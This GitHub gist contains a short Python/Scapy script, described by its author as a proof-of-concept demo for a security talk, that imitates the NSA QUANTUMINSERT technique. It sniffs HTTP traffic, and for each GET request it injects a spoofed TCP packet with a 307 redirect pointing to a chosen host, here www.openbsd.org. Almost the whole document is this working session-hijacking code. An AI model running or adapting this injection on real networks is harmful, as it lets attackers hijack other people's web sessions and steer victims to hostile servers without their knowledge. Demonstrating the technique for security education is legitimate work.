Created
March 18, 2015 06:03
-
-
Save jpouellet/ac93c7644ea88ad64e11 to your computer and use it in GitHub Desktop.
Ghetto QUANTUMINSERT with Scapy.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FOXACID = 'www.openbsd.org' | |
def QUANTUMINSERT(p): | |
p.show() | |
if Raw in p and p['Raw'].load.startswith('GET /') and p['Raw'].load.endswith('\r\n\r\n'): | |
ip = IP(flags='DF', src=p['IP'].dst, dst=p['IP'].src) | |
tcp = TCP(sport=p['TCP'].dport, dport=p['TCP'].sport, flags='PA', seq=p['TCP'].ack, ack=p['TCP'].seq + len(p['Raw'].load)) | |
http = 'HTTP/1.1 307 Temporary Redirect\r\nLocation: http://'+FOXACID+'/\r\nConnection: close\r\n\r\n' | |
out = ip / tcp / http | |
print '[*OUT*]' | |
out.show() | |
print 'sending...' | |
send(out) | |
p | |
# TURMOIL? | |
suckers = sniff(filter='tcp port http and host not '+FOXACID, prn=QUANTUMINSERT) | |
# Warning: May cause infinite FIN/FIN-ACK loop, but gets the job done regardless. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
If somebody wants to improve this to properly terminate the connection, then be my guest. It was written at 4am as a proof-of-concept demo for a VTCSEC talk the next day.